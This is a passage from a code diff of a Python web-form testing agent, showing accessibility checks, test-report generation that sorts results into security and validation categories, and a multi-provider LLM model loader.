        missing_alt = await self.page.locator("img:not([alt])").count()
        if missing_alt > 0:
            findings.append(f"{missing_alt} images missing alt text")

        # 2) Buttons without an accessible name (capped at 200 for speed).
        unnamed_buttons = 0
        for button in (await self.page.locator("button").all())[:200]:
            try:
                aria_name = await button.get_attribute("aria-label")
                label_text = await button.text_content()
                has_name = (aria_name and aria_name.strip()) or (label_text and label_text.strip())
                if not has_name:
                    unnamed_buttons += 1
            except Exception:
                continue
        if unnamed_buttons:
            findings.append(f"{unnamed_buttons} buttons without accessible name")

        # 3) Form controls without a label or aria-label (capped at 300).
        unlabeled_controls = 0
        for control in (await self.page.locator("input, textarea, select").all())[:300]:
            try:
                control_id = await control.get_attribute("id")
                aria_label = await control.get_attribute("aria-label")
                labelled = False
                if control_id:
                    labelled = await self.page.locator(f"label[for='{control_id}']").count() > 0
                if not labelled and not (aria_label and aria_label.strip()):
                    unlabeled_controls += 1
            except Exception:
                continue
        if unlabeled_controls:
            findings.append(f"{unlabeled_controls} inputs without label or aria-label")

        # 4) Negative tabindex removes elements from keyboard navigation.
        negative_tabindex = await self.page.locator("[tabindex='-1']").count()
        if negative_tabindex:
            findings.append(f"{negative_tabindex} elements with tabindex='-1'")

        return {
            "issues": findings,
            "passed": len(findings) == 0
        }
    except Exception as e:
        return {"error": str(e)}
|
| 920 |
+
|
| 921 |
+
def _evaluate_test_result(self, scenario: TestScenario, actual_result: str) -> bool:
|
| 922 |
+
"""Evaluate whether a test scenario passed or failed."""
|
| 923 |
+
if scenario.expected_result == "success":
|
| 924 |
+
return actual_result == "success"
|
| 925 |
+
elif scenario.expected_result == "validation_error":
|
| 926 |
+
return actual_result in ["validation_error", "required_error"]
|
| 927 |
+
elif scenario.expected_result == "security_error":
|
| 928 |
+
return actual_result == "security_error"
|
| 929 |
+
elif scenario.expected_result == "authentication_error":
|
| 930 |
+
return actual_result in ["validation_error", "authentication_error"]
|
| 931 |
+
else:
|
| 932 |
+
return False
|
| 933 |
+
|
| 934 |
+
async def generate_comprehensive_report(self) -> Dict[str, Any]:
    """Generate a comprehensive test report.

    Aggregates the collected TestResults by scenario type, priority, and
    security/validation category, then attaches per-test details and
    remediation recommendations.

    Returns:
        A JSON-serializable dict with "summary", per-category breakdowns,
        "detailed_results", and "recommendations".
    """
    logger.info("📊 Generating comprehensive test report...")

    total_tests = len(self.test_results)
    passed_tests = sum(1 for r in self.test_results if r.success)
    failed_tests = total_tests - passed_tests

    # Categorize results. by_priority pre-seeds priorities 1-3 but now
    # tolerates any other priority value via setdefault (the original
    # raised KeyError for priorities outside 1-3).
    by_scenario_type = {}
    by_priority = {1: [], 2: [], 3: []}
    security_tests = []
    validation_tests = []

    for result in self.test_results:
        scenario_name = result.scenario.name
        # Scenario names follow the "<type> - <detail>" convention.
        scenario_type = scenario_name.split(" - ")[0] if " - " in scenario_name else "Other"

        by_scenario_type.setdefault(scenario_type, []).append(result)
        by_priority.setdefault(result.scenario.priority, []).append(result)

        if "SQL Injection" in scenario_name or "XSS" in scenario_name:
            security_tests.append(result)
        else:
            validation_tests.append(result)

    # Overall pass percentage; guarded against division by zero.
    success_rate = (passed_tests / total_tests * 100) if total_tests > 0 else 0

    report = {
        "summary": {
            "total_tests": total_tests,
            "passed_tests": passed_tests,
            "failed_tests": failed_tests,
            "success_rate": round(success_rate, 2),
            "test_duration": "N/A",  # not tracked yet; would require start/end timestamps
            "timestamp": datetime.now().isoformat()
        },
        "by_scenario_type": {
            scenario_type: {
                "total": len(results),
                "passed": sum(1 for r in results if r.success),
                "failed": sum(1 for r in results if not r.success)
            }
            for scenario_type, results in by_scenario_type.items()
        },
        "by_priority": {
            # Empty priority buckets are omitted from the report.
            f"Priority {priority}": {
                "total": len(results),
                "passed": sum(1 for r in results if r.success),
                "failed": sum(1 for r in results if not r.success)
            }
            for priority, results in by_priority.items() if results
        },
        "security_tests": {
            "total": len(security_tests),
            "passed": sum(1 for r in security_tests if r.success),
            "failed": sum(1 for r in security_tests if not r.success)
        },
        "validation_tests": {
            "total": len(validation_tests),
            "passed": sum(1 for r in validation_tests if r.success),
            "failed": sum(1 for r in validation_tests if not r.success)
        },
        "detailed_results": [
            {
                "scenario_name": result.scenario.name,
                "description": result.scenario.description,
                "priority": result.scenario.priority,
                "success": result.success,
                "expected_result": result.scenario.expected_result,
                "actual_result": result.actual_result,
                "error_message": result.error_message,
                "screenshot_path": result.screenshot_path,
                "timestamp": result.timestamp.isoformat() if result.timestamp else None
            }
            for result in self.test_results
        ],
        "recommendations": self._generate_recommendations()
    }

    logger.info(f"✅ Comprehensive report generated: {passed_tests}/{total_tests} tests passed ({success_rate:.1f}%)")
    return report
|
| 1020 |
+
|
| 1021 |
+
def get_detailed_error_report(self) -> Dict[str, Any]:
    """Get a detailed error report with comprehensive analysis.

    Combines the raw testing statistics with the error handler's summary,
    a breakdown of discovered form fields, coverage percentages, and
    improvement recommendations.
    """
    error_summary = self.error_handler.get_error_summary()

    # Count fields per type in a single pass (the original recomputed the
    # count for every field, which was quadratic in the number of fields).
    field_type_counts: Dict[str, int] = {}
    for field in self.form_fields:
        field_type_counts[field.field_type] = field_type_counts.get(field.field_type, 0) + 1

    # Clamp the denominator to 1 to avoid division by zero before any tests ran.
    total_tests = max(self.testing_stats["total_tests"], 1)

    return {
        "testing_statistics": self.testing_stats,
        "error_analysis": error_summary,
        "form_field_analysis": {
            "total_fields": len(self.form_fields),
            "field_types": field_type_counts,
            "required_fields": sum(1 for field in self.form_fields if field.required),
            "fields_with_validation": sum(1 for field in self.form_fields if field.validation_pattern)
        },
        "test_coverage": {
            "scenarios_executed": len(self.test_results),
            "success_rate": f"{(self.testing_stats['passed_tests'] / total_tests * 100):.2f}%",
            "error_rate": f"{(self.testing_stats['error_tests'] / total_tests * 100):.2f}%"
        },
        "recommendations": self._generate_improvement_recommendations()
    }
|
| 1044 |
+
|
| 1045 |
+
def _generate_improvement_recommendations(self) -> List[str]:
|
| 1046 |
+
"""Generate improvement recommendations based on test results."""
|
| 1047 |
+
recommendations = []
|
| 1048 |
+
|
| 1049 |
+
if self.testing_stats["error_tests"] > 0:
|
| 1050 |
+
recommendations.append("🔧 Consider improving error handling and field validation")
|
| 1051 |
+
|
| 1052 |
+
if self.testing_stats["passed_tests"] < self.testing_stats["total_tests"] * 0.8:
|
| 1053 |
+
recommendations.append("📈 Review form validation logic and user experience")
|
| 1054 |
+
|
| 1055 |
+
if len(self.form_fields) == 0:
|
| 1056 |
+
recommendations.append("🔍 No form fields detected - verify page content and selectors")
|
| 1057 |
+
|
| 1058 |
+
if self.testing_stats["error_tests"] > self.testing_stats["total_tests"] * 0.3:
|
| 1059 |
+
recommendations.append("⚠️ High error rate detected - check page stability and element selectors")
|
| 1060 |
+
|
| 1061 |
+
return recommendations
|
| 1062 |
+
|
| 1063 |
+
def _generate_recommendations(self) -> List[str]:
|
| 1064 |
+
"""Generate recommendations based on test results."""
|
| 1065 |
+
recommendations = []
|
| 1066 |
+
|
| 1067 |
+
failed_tests = [r for r in self.test_results if not r.success]
|
| 1068 |
+
|
| 1069 |
+
if not failed_tests:
|
| 1070 |
+
recommendations.append("🎉 All tests passed! The form validation is working correctly.")
|
| 1071 |
+
return recommendations
|
| 1072 |
+
|
| 1073 |
+
# Analyze failure patterns
|
| 1074 |
+
validation_failures = [r for r in failed_tests if "validation" in r.scenario.name.lower()]
|
| 1075 |
+
security_failures = [r for r in failed_tests if any(x in r.scenario.name.lower() for x in ["sql", "xss", "injection"])]
|
| 1076 |
+
required_failures = [r for r in failed_tests if "empty" in r.scenario.name.lower()]
|
| 1077 |
+
|
| 1078 |
+
if validation_failures:
|
| 1079 |
+
recommendations.append("⚠️ Some validation tests failed. Review form validation rules and error messages.")
|
| 1080 |
+
|
| 1081 |
+
if security_failures:
|
| 1082 |
+
recommendations.append("🔒 Security tests failed. Implement proper input sanitization and validation.")
|
| 1083 |
+
|
| 1084 |
+
if required_failures:
|
| 1085 |
+
recommendations.append("📝 Required field validation needs improvement. Ensure proper error messages for empty required fields.")
|
| 1086 |
+
|
| 1087 |
+
# Specific recommendations based on field types
|
| 1088 |
+
email_failures = [r for r in failed_tests if "email" in r.scenario.name.lower()]
|
| 1089 |
+
if email_failures:
|
| 1090 |
+
recommendations.append("📧 Email validation needs improvement. Implement proper email format validation.")
|
| 1091 |
+
|
| 1092 |
+
password_failures = [r for r in failed_tests if "password" in r.scenario.name.lower()]
|
| 1093 |
+
if password_failures:
|
| 1094 |
+
recommendations.append("🔐 Password validation needs improvement. Implement proper password strength requirements.")
|
| 1095 |
+
|
| 1096 |
+
return recommendations
|
src/utils/llm_provider.py
ADDED
|
@@ -0,0 +1,366 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - LLM Provider
|
| 3 |
+
========================================================
|
| 4 |
+
|
| 5 |
+
LLM provider utilities and configurations for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
from openai import OpenAI
|
| 13 |
+
import pdb
|
| 14 |
+
from langchain_openai import ChatOpenAI
|
| 15 |
+
from langchain_core.globals import get_llm_cache
|
| 16 |
+
from langchain_core.language_models.base import (
|
| 17 |
+
BaseLanguageModel,
|
| 18 |
+
LangSmithParams,
|
| 19 |
+
LanguageModelInput,
|
| 20 |
+
)
|
| 21 |
+
import os
|
| 22 |
+
from langchain_core.load import dumpd, dumps
|
| 23 |
+
from langchain_core.messages import (
|
| 24 |
+
AIMessage,
|
| 25 |
+
SystemMessage,
|
| 26 |
+
AnyMessage,
|
| 27 |
+
BaseMessage,
|
| 28 |
+
BaseMessageChunk,
|
| 29 |
+
HumanMessage,
|
| 30 |
+
convert_to_messages,
|
| 31 |
+
message_chunk_to_message,
|
| 32 |
+
)
|
| 33 |
+
from langchain_core.outputs import (
|
| 34 |
+
ChatGeneration,
|
| 35 |
+
ChatGenerationChunk,
|
| 36 |
+
ChatResult,
|
| 37 |
+
LLMResult,
|
| 38 |
+
RunInfo,
|
| 39 |
+
)
|
| 40 |
+
from langchain_ollama import ChatOllama
|
| 41 |
+
from langchain_core.output_parsers.base import OutputParserLike
|
| 42 |
+
from langchain_core.runnables import Runnable, RunnableConfig
|
| 43 |
+
from langchain_core.tools import BaseTool
|
| 44 |
+
|
| 45 |
+
from typing import (
|
| 46 |
+
TYPE_CHECKING,
|
| 47 |
+
Any,
|
| 48 |
+
Callable,
|
| 49 |
+
Literal,
|
| 50 |
+
Optional,
|
| 51 |
+
Union,
|
| 52 |
+
cast, List,
|
| 53 |
+
)
|
| 54 |
+
from langchain_anthropic import ChatAnthropic
|
| 55 |
+
from langchain_mistralai import ChatMistralAI
|
| 56 |
+
from langchain_google_genai import ChatGoogleGenerativeAI
|
| 57 |
+
from langchain_ollama import ChatOllama
|
| 58 |
+
from langchain_openai import AzureChatOpenAI, ChatOpenAI
|
| 59 |
+
from langchain_ibm import ChatWatsonx
|
| 60 |
+
from langchain_aws import ChatBedrock
|
| 61 |
+
from pydantic import SecretStr
|
| 62 |
+
|
| 63 |
+
from src.utils import config
|
| 64 |
+
|
| 65 |
+
|
| 66 |
+
class DeepSeekR1ChatOpenAI(ChatOpenAI):
    """ChatOpenAI variant for DeepSeek R1 that surfaces ``reasoning_content``.

    The stock LangChain transport drops DeepSeek's non-standard
    ``reasoning_content`` field, so this class calls the API through a raw
    OpenAI client and attaches the reasoning text to the returned AIMessage.
    """

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        super().__init__(*args, **kwargs)
        # Raw client used instead of the LangChain transport so the
        # non-standard `reasoning_content` response field is preserved.
        self.client = OpenAI(
            base_url=kwargs.get("base_url"),
            api_key=kwargs.get("api_key")
        )

    def _call_deepseek(self, input: LanguageModelInput) -> AIMessage:
        """Convert LangChain messages to the OpenAI wire format, call the API,
        and wrap content + reasoning_content in an AIMessage.

        Shared by invoke/ainvoke, which previously duplicated this body.
        """
        message_history = []
        for input_ in input:
            if isinstance(input_, SystemMessage):
                role = "system"
            elif isinstance(input_, AIMessage):
                role = "assistant"
            else:
                role = "user"
            message_history.append({"role": role, "content": input_.content})

        response = self.client.chat.completions.create(
            model=self.model_name,
            messages=message_history
        )
        choice_message = response.choices[0].message
        return AIMessage(
            content=choice_message.content,
            reasoning_content=choice_message.reasoning_content,
        )

    async def ainvoke(
        self,
        input: LanguageModelInput,
        config: Optional[RunnableConfig] = None,
        *,
        stop: Optional[list[str]] = None,
        **kwargs: Any,
    ) -> AIMessage:
        # NOTE(review): the underlying OpenAI call is synchronous, so this
        # blocks the event loop — same behavior as the original implementation;
        # switching to AsyncOpenAI would be the real fix.
        return self._call_deepseek(input)

    def invoke(
        self,
        input: LanguageModelInput,
        config: Optional[RunnableConfig] = None,
        *,
        stop: Optional[list[str]] = None,
        **kwargs: Any,
    ) -> AIMessage:
        return self._call_deepseek(input)
|
| 126 |
+
|
| 127 |
+
|
| 128 |
+
class DeepSeekR1ChatOllama(ChatOllama):
    """ChatOllama variant for DeepSeek R1 that splits ``<think>`` reasoning
    out of the raw completion into ``AIMessage.reasoning_content``."""

    @staticmethod
    def _split_reasoning(raw: str) -> tuple[str, str]:
        """Split a raw completion into (content, reasoning_content).

        DeepSeek R1 emits ``<think>...</think>`` before the answer. When the
        closing tag is absent the whole text is treated as content with empty
        reasoning, instead of raising IndexError as the original
        ``split("</think>")[1]`` did.
        """
        before, sep, after = raw.partition("</think>")
        if sep:
            reasoning = before.replace("<think>", "")
            content = after
        else:
            reasoning = ""
            content = raw
        # Some prompts make the model wrap the final answer behind this marker.
        if "**JSON Response:**" in content:
            content = content.split("**JSON Response:**")[-1]
        return content, reasoning

    async def ainvoke(
        self,
        input: LanguageModelInput,
        config: Optional[RunnableConfig] = None,
        *,
        stop: Optional[list[str]] = None,
        **kwargs: Any,
    ) -> AIMessage:
        org_ai_message = await super().ainvoke(input=input)
        content, reasoning_content = self._split_reasoning(org_ai_message.content)
        return AIMessage(content=content, reasoning_content=reasoning_content)

    def invoke(
        self,
        input: LanguageModelInput,
        config: Optional[RunnableConfig] = None,
        *,
        stop: Optional[list[str]] = None,
        **kwargs: Any,
    ) -> AIMessage:
        org_ai_message = super().invoke(input=input)
        content, reasoning_content = self._split_reasoning(org_ai_message.content)
        return AIMessage(content=content, reasoning_content=reasoning_content)
|
| 161 |
+
|
| 162 |
+
|
| 163 |
+
def get_llm_model(provider: str, **kwargs):
    """
    Get LLM model
    :param provider: LLM provider name, e.g. "openai", "anthropic", "ollama".
    :param kwargs: provider options — commonly model_name, temperature,
        base_url, api_key; some providers also read num_ctx/num_predict
        (ollama, ibm) or api_version (azure_openai).
    :return: a configured LangChain chat-model instance for the provider.
    :raises ValueError: if the provider needs an API key and none is found,
        or if the provider name is not supported.
    """
    # Every provider except ollama/bedrock requires an API key, taken from
    # kwargs first and then from the <PROVIDER>_API_KEY environment variable.
    if provider not in ["ollama", "bedrock"]:
        env_var = f"{provider.upper()}_API_KEY"
        api_key = kwargs.get("api_key", "") or os.getenv(env_var, "")
        if not api_key:
            provider_display = config.PROVIDER_DISPLAY_NAMES.get(provider, provider.upper())
            error_msg = f"💥 {provider_display} API key not found! 🔑 Please set the `{env_var}` environment variable or provide it in the UI."
            raise ValueError(error_msg)
        kwargs["api_key"] = api_key

    if provider == "anthropic":
        # Explicit base_url wins; otherwise use the public Anthropic endpoint.
        if not kwargs.get("base_url", ""):
            base_url = "https://api.anthropic.com"
        else:
            base_url = kwargs.get("base_url")

        return ChatAnthropic(
            model=kwargs.get("model_name", "claude-3-5-sonnet-20241022"),
            temperature=kwargs.get("temperature", 0.0),
            base_url=base_url,
            api_key=api_key,
        )
    elif provider == 'mistral':
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("MISTRAL_ENDPOINT", "https://api.mistral.ai/v1")
        else:
            base_url = kwargs.get("base_url")
        # NOTE(review): re-derives api_key even though the gate above already
        # set kwargs["api_key"]; behavior kept as-is.
        if not kwargs.get("api_key", ""):
            api_key = os.getenv("MISTRAL_API_KEY", "")
        else:
            api_key = kwargs.get("api_key")

        return ChatMistralAI(
            model=kwargs.get("model_name", "mistral-large-latest"),
            temperature=kwargs.get("temperature", 0.0),
            base_url=base_url,
            api_key=api_key,
        )
    elif provider == "openai":
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("OPENAI_ENDPOINT", "https://api.openai.com/v1")
        else:
            base_url = kwargs.get("base_url")

        return ChatOpenAI(
            model=kwargs.get("model_name", "gpt-4o"),
            temperature=kwargs.get("temperature", 0.0),
            base_url=base_url,
            api_key=api_key,
        )
    elif provider == "grok":
        # Grok exposes an OpenAI-compatible API, so ChatOpenAI is reused.
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("GROK_ENDPOINT", "https://api.x.ai/v1")
        else:
            base_url = kwargs.get("base_url")

        return ChatOpenAI(
            model=kwargs.get("model_name", "grok-3"),
            temperature=kwargs.get("temperature", 0.0),
            base_url=base_url,
            api_key=api_key,
        )
    elif provider == "deepseek":
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("DEEPSEEK_ENDPOINT", "")
        else:
            base_url = kwargs.get("base_url")

        # The reasoner model needs the custom wrapper that preserves
        # reasoning_content; the plain chat model uses stock ChatOpenAI.
        if kwargs.get("model_name", "deepseek-chat") == "deepseek-reasoner":
            return DeepSeekR1ChatOpenAI(
                model=kwargs.get("model_name", "deepseek-reasoner"),
                temperature=kwargs.get("temperature", 0.0),
                base_url=base_url,
                api_key=api_key,
            )
        else:
            return ChatOpenAI(
                model=kwargs.get("model_name", "deepseek-chat"),
                temperature=kwargs.get("temperature", 0.0),
                base_url=base_url,
                api_key=api_key,
            )
    elif provider == "google":
        return ChatGoogleGenerativeAI(
            model=kwargs.get("model_name", "gemini-2.0-flash-exp"),
            temperature=kwargs.get("temperature", 0.0),
            api_key=api_key,
        )
    elif provider == "ollama":
        # Local server; no API key is required for this provider.
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("OLLAMA_ENDPOINT", "http://localhost:11434")
        else:
            base_url = kwargs.get("base_url")

        # deepseek-r1 models need the wrapper that strips <think> blocks.
        if "deepseek-r1" in kwargs.get("model_name", "qwen2.5:7b"):
            return DeepSeekR1ChatOllama(
                model=kwargs.get("model_name", "deepseek-r1:14b"),
                temperature=kwargs.get("temperature", 0.0),
                num_ctx=kwargs.get("num_ctx", 32000),
                base_url=base_url,
            )
        else:
            return ChatOllama(
                model=kwargs.get("model_name", "qwen2.5:7b"),
                temperature=kwargs.get("temperature", 0.0),
                num_ctx=kwargs.get("num_ctx", 32000),
                num_predict=kwargs.get("num_predict", 1024),
                base_url=base_url,
            )
    elif provider == "azure_openai":
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("AZURE_OPENAI_ENDPOINT", "")
        else:
            base_url = kwargs.get("base_url")
        api_version = kwargs.get("api_version", "") or os.getenv("AZURE_OPENAI_API_VERSION", "2025-01-01-preview")
        return AzureChatOpenAI(
            model=kwargs.get("model_name", "gpt-4o"),
            temperature=kwargs.get("temperature", 0.0),
            api_version=api_version,
            azure_endpoint=base_url,
            api_key=api_key,
        )
    elif provider == "alibaba":
        # DashScope's OpenAI-compatible endpoint.
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("ALIBABA_ENDPOINT", "https://dashscope.aliyuncs.com/compatible-mode/v1")
        else:
            base_url = kwargs.get("base_url")

        return ChatOpenAI(
            model=kwargs.get("model_name", "qwen-plus"),
            temperature=kwargs.get("temperature", 0.0),
            base_url=base_url,
            api_key=api_key,
        )
    elif provider == "ibm":
        parameters = {
            "temperature": kwargs.get("temperature", 0.0),
            "max_tokens": kwargs.get("num_ctx", 32000)
        }
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("IBM_ENDPOINT", "https://us-south.ml.cloud.ibm.com")
        else:
            base_url = kwargs.get("base_url")

        # NOTE(review): watsonx reads project id and key from the environment
        # only, ignoring the api_key resolved above — confirm this is intended.
        return ChatWatsonx(
            model_id=kwargs.get("model_name", "ibm/granite-vision-3.1-2b-preview"),
            url=base_url,
            project_id=os.getenv("IBM_PROJECT_ID"),
            apikey=os.getenv("IBM_API_KEY"),
            params=parameters
        )
    elif provider == "moonshot":
        # NOTE(review): endpoint and key come from the environment only here,
        # unlike the other branches — confirm against the settings UI.
        return ChatOpenAI(
            model=kwargs.get("model_name", "moonshot-v1-32k-vision-preview"),
            temperature=kwargs.get("temperature", 0.0),
            base_url=os.getenv("MOONSHOT_ENDPOINT"),
            api_key=os.getenv("MOONSHOT_API_KEY"),
        )
    elif provider == "unbound":
        return ChatOpenAI(
            model=kwargs.get("model_name", "gpt-4o-mini"),
            temperature=kwargs.get("temperature", 0.0),
            base_url=os.getenv("UNBOUND_ENDPOINT", "https://api.getunbound.ai"),
            api_key=api_key,
        )
    elif provider == "siliconflow":
        # NOTE(review): env var names use mixed case ("SiliconFLOW_..."), which
        # os.getenv treats case-sensitively — verify the deployment env matches.
        if not kwargs.get("api_key", ""):
            api_key = os.getenv("SiliconFLOW_API_KEY", "")
        else:
            api_key = kwargs.get("api_key")
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("SiliconFLOW_ENDPOINT", "")
        else:
            base_url = kwargs.get("base_url")
        return ChatOpenAI(
            api_key=api_key,
            base_url=base_url,
            model_name=kwargs.get("model_name", "Qwen/QwQ-32B"),
            temperature=kwargs.get("temperature", 0.0),
        )
    elif provider == "modelscope":
        if not kwargs.get("api_key", ""):
            api_key = os.getenv("MODELSCOPE_API_KEY", "")
        else:
            api_key = kwargs.get("api_key")
        if not kwargs.get("base_url", ""):
            base_url = os.getenv("MODELSCOPE_ENDPOINT", "")
        else:
            base_url = kwargs.get("base_url")
        return ChatOpenAI(
            api_key=api_key,
            base_url=base_url,
            model_name=kwargs.get("model_name", "Qwen/QwQ-32B"),
            temperature=kwargs.get("temperature", 0.0),
            # extra_body disables Qwen's "thinking" stream on ModelScope.
            extra_body = {"enable_thinking": False}
        )
    else:
        raise ValueError(f"Unsupported provider: {provider}")
|
src/utils/mcp_client.py
ADDED
|
@@ -0,0 +1,254 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import inspect
|
| 2 |
+
import logging
|
| 3 |
+
